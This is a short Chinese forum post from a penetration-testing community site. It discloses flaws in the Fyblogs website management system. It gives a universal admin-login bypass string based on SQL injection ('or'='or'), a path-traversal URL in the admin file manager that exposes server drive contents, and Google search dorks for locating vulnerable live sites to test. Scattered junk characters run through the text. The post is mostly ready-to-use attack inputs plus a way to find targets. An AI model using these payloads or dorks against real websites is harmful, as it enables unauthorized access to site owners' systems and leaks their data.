中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
8 c8 A; u( H0 B: y
7 Q% J/ f3 X8 L简要描述:
$ t; e, I0 D- r" z- O' ~/ M% Y) E6 `( ?; t- w. v3 }
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!" X- v1 f6 {+ U% H$ T
& T$ k+ ^. Y" |9 o# C3 o
详细说明:
3 A* [0 K+ n: r" }. ^* X  w* W1 i/ z1 d8 d8 K
后台万能密码 'or'='or'
4 e( i) \, b. t( U  P: `  i后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
$ L* o8 M$ u) v/ k5 @admin/uploadfile.asp?currentFolder=/upfiles/../
) K) G; f/ s$ V: x0 r  S7 X" P5 ?5 d5 C, W* h4 b2 h/ \
漏洞证明:
4 e* f) F) ^! f+ ?  e5 e4 u& H" y  M! b# O2 a
谷歌:inurl:type.asp?id=1 新闻中心* R$ X8 Z, [$ H' B0 S9 c6 d9 b
或者 :inurl:download_ok.asp?
: P* X, A1 E, c3 N
$ }. \3 [& Y0 z可以测试
7 o, m: A5 I$ f4 q) T6 }$ O+ a' d  T$ |9 t2 o0 }% a; V

: y, D" w3 y% _) ?  z( F  I, Y



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2